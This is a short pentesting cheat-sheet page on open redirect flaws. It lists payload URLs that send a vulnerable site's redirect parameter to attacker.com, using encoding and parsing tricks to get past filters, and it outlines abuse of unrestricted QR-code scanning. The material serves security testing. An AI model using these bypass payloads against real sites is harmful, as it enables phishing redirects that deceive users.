Open Redirect
Last modified: 2023-06-13
It accepts a user-controlled input that specifies a link to an external site and uses that link in a redirect.
Payloads
https://vulnerable.com/example.php?redirectUrl=https://attacker.com/
https://vulnerable.com/example.php?redirectUrl=https:\\attacker.com\
https://vulnerable.com/example.php?redirectUrl=https://attacker.com#.vulnerable.com/
<!-- "%E3%80%82" is "." -->
https://vulnerable.com/example.php?redirectUrl=https://attacker.com%E3%80%82%23.vulnerable.com/
<!-- "%0d" is newline -->
https://vulnerable.com/example.php?redirectUrl=/%0d/attacker.com/
Unrestricted QR Code Scanning
Reference: https://shahjerry33.medium.com/open-redirection-qr-code-magic-18ace1a0170f
If website (or mobile application) has the function for scanning QR code but not restricts URL, we can let it to read malicious QR code.
1. Generate QR Code
First, we need to create a malicious QR code. There are many online tools for generating it.
2. Read Malicious QR Code in the Application
After generating the QR code, read the QR code in the target application.
If the application does not validate the URL, we can access to the malicious URL.